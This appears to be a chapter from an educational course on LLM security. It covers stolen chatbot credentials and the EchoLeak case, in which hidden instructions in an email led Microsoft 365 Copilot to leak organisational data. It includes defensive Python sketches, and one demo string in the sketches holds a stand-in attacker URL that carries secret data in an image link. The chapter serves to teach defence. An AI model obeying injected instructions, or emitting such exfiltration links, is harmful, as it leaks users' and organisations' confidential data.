Boo-AI — Master Artificial Intelligence by Building from Scratch

Introduction

Large Language Models represent a fundamentally new category of software system from a security perspective. Traditional applications have well-defined input/output boundaries. LLMs instead accept natural language, an effectively unbounded input space, and produce natural language outputs that can encode arbitrary instructions, data, and behaviors.

This chapter examines the unique security challenges posed by LLMs, from their role as attack tools to their vulnerabilities as targets. The attack surface of an LLM deployment extends far beyond the model itself, encompassing the prompt engineering layer, retrieval systems, tool integrations, and the human users who interact with the system.

LLMs as Tools, Targets, and Vectors

What makes LLM security uniquely complex is that these models simultaneously occupy three security roles. As tools, they enhance the capabilities of both defenders and attackers. As targets, their training data, system prompts, and model weights are valuable assets to protect. As attack vectors, they can be manipulated to perform actions their operators never intended.

This triple role means that LLM security cannot be reduced to a single problem domain. Protecting an LLM deployment requires expertise in application security, data privacy, access control, and the unique properties of neural network systems. Traditional security frameworks must be extended to account for the probabilistic, non-deterministic nature of language model behavior.

LLM as tool: Attackers use LLMs to generate phishing content, write malware, automate reconnaissance, and scale social engineering campaigns
LLM as target: Adversaries attempt to extract training data, steal system prompts, and exfiltrate confidential information processed by the model
LLM as vector: Through prompt injection, attackers hijack the LLM to execute actions in connected systems, turning the model into an unwitting accomplice

Key Insight: The most dangerous LLM attacks exploit the model as an attack vector. When an LLM has access to tools, APIs, or databases, a successful prompt injection can turn the model's legitimate capabilities against the organization that deployed it.
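One common way to limit this risk is to put a policy check between the model and its tools, so that a tool call proposed by the model is never executed on the model's word alone. The following is a minimal sketch of that idea, not a complete defense. The tool names, the ToolCall type, and the authorize function are all hypothetical and chosen only for illustration.

```python
from dataclasses import dataclass

# Hypothetical tool names, assumed for this sketch only.
READ_ONLY_TOOLS = {"search_docs", "get_calendar"}
SENSITIVE_TOOLS = {"send_email", "delete_file"}


@dataclass
class ToolCall:
    """A tool invocation proposed by the model (illustrative type)."""
    name: str
    arguments: dict


def authorize(call: ToolCall, user_confirmed: bool = False) -> str:
    """Return 'allow', 'confirm', or 'deny' for a model-proposed tool call."""
    if call.name in READ_ONLY_TOOLS:
        return "allow"
    if call.name in SENSITIVE_TOOLS:
        # Side-effecting actions require explicit human approval, because
        # the request may originate from injected text rather than the user.
        return "allow" if user_confirmed else "confirm"
    # Anything not explicitly listed is rejected (default deny).
    return "deny"


if __name__ == "__main__":
    print(authorize(ToolCall("search_docs", {"query": "Q3 plan"})))
    print(authorize(ToolCall("send_email", {"to": "someone@example.com"})))
    print(authorize(ToolCall("run_shell", {"cmd": "ls"})))
```

The default-deny branch is the important design choice here: a tool the operator has not classified cannot be reached through the model at all, whatever the prompt says.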

The Credential Black Market

By 2024, over 300,000 compromised ChatGPT credentials had been identified on dark web marketplaces. These credentials grant attackers access to users' conversation histories, which often contain sensitive corporate information, proprietary code, strategic plans, and personal data that users shared with the AI assistant without considering the security implications.

The credential theft problem highlights a fundamental challenge with LLM deployments: users treat AI assistants as trusted confidants, sharing information they would never put in an email or upload to an unsecured server. The conversational interface creates a false sense of privacy that attackers exploit by targeting the authentication layer rather than the model itself.

Organizations deploying LLMs must implement robust authentication practices, including multi-factor authentication, session management, and monitoring for anomalous usage patterns. They must also educate users about the risks of sharing sensitive information through AI interfaces, treating LLM conversations with the same security awareness applied to email and messaging platforms.
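As a rough illustration of what monitoring for anomalous usage patterns could look like, the sketch below flags a session when it comes from a country not previously seen for the account, or when the request rate far exceeds the account's usual rate. The AccountProfile fields, the anomaly_reasons function, and the threshold values are assumptions made for this example. A production system would rely on richer signals and tuned thresholds.

```python
from dataclasses import dataclass, field


@dataclass
class AccountProfile:
    """Baseline behavior for one account (illustrative fields)."""
    known_countries: set = field(default_factory=set)
    typical_requests_per_hour: float = 20.0


def anomaly_reasons(profile, country, requests_last_hour, rate_multiplier=5.0):
    """Return a list of reasons why the current session looks unusual."""
    reasons = []
    # A login from a country never seen for this account is suspicious.
    if profile.known_countries and country not in profile.known_countries:
        reasons.append("new_country")
    # A request rate far above the baseline may indicate bulk scraping
    # of conversation history with a stolen credential.
    if requests_last_hour > profile.typical_requests_per_hour * rate_multiplier:
        reasons.append("request_spike")
    return reasons


if __name__ == "__main__":
    profile = AccountProfile(known_countries={"DE"}, typical_requests_per_hour=10)
    print(anomaly_reasons(profile, "DE", 12))
    print(anomaly_reasons(profile, "BR", 500))
```

A non-empty result would typically trigger a step-up check such as re-authentication with a second factor, rather than an outright block.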

EchoLeak and Copilot Attacks

The EchoLeak attack, disclosed against Microsoft 365 Copilot in 2025, illustrates the severity of LLM security vulnerabilities in enterprise deployments. Researchers showed that a crafted email containing hidden instructions could cause Copilot to leak sensitive information it had access to through its integration with Microsoft 365 services, including emails, documents, and calendar entries, without the victim having to click anything.

What made EchoLeak particularly alarming was that it exploited the very feature that makes enterprise AI assistants useful: their deep integration with organizational data. The same access that allows Copilot to summarize your emails and draft responses also creates a pathway for data exfiltration when the model is manipulated through instructions injected into the content it reads.

Why This Matters: Enterprise LLM deployments create a new class of insider threat. The AI assistant has broad access to organizational data, and if an attacker can control its behavior through prompt injection, the assistant can become the most capable insider in the organization: one that can reach everything it has been granted access to and can synthesize information across silos.

Data access scope: Enterprise LLMs often have broader data access than any individual employee, creating a high-value target
Trust boundary confusion: Users and downstream systems tend to treat LLM outputs as authoritative, so a manipulated response is rarely questioned and is hard to tell apart from a legitimate one
Defense gap: Traditional security tools like DLP and CASB were not designed for natural language interfaces and struggle to detect LLM-based data exfiltration
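One partial mitigation for the defense gap described above is to inspect model output before it is rendered, since a URL in the output whose path or query string carries data is a common exfiltration channel. The sketch below flags and redacts links to hosts outside an allowlist. The ALLOWED_HOSTS value, the function names, and the URL pattern are assumptions for illustration. This is not a description of how any vendor's product filters output, and a simple pattern like this will not catch every encoding of a link.

```python
import re
from urllib.parse import urlparse

# Hypothetical allowlist of hosts the assistant may link to.
ALLOWED_HOSTS = {"intranet.example.com"}

# Deliberately simple pattern: stops at whitespace, quotes, and closing brackets.
URL_PATTERN = re.compile(r"https?://[^\s)\]>'\"]+")


def _is_allowed(url: str) -> bool:
    host = (urlparse(url).hostname or "").lower()
    return host in ALLOWED_HOSTS


def external_urls(model_output: str) -> list:
    """Return every URL in the output that points at a non-allowlisted host."""
    return [u for u in URL_PATTERN.findall(model_output) if not _is_allowed(u)]


def redact_external_urls(model_output: str) -> str:
    """Replace non-allowlisted URLs so they are never rendered or fetched."""
    def replace(match):
        url = match.group(0)
        return url if _is_allowed(url) else "[link removed]"
    return URL_PATTERN.sub(replace, model_output)


if __name__ == "__main__":
    text = ("Summary ready. ![status](https://attacker.example/p.png?d=secret) "
            "Source: https://intranet.example.com/doc")
    print(external_urls(text))
    print(redact_external_urls(text))
```

Redacting before rendering matters because a client that automatically loads images would otherwise contact the external host without any user action.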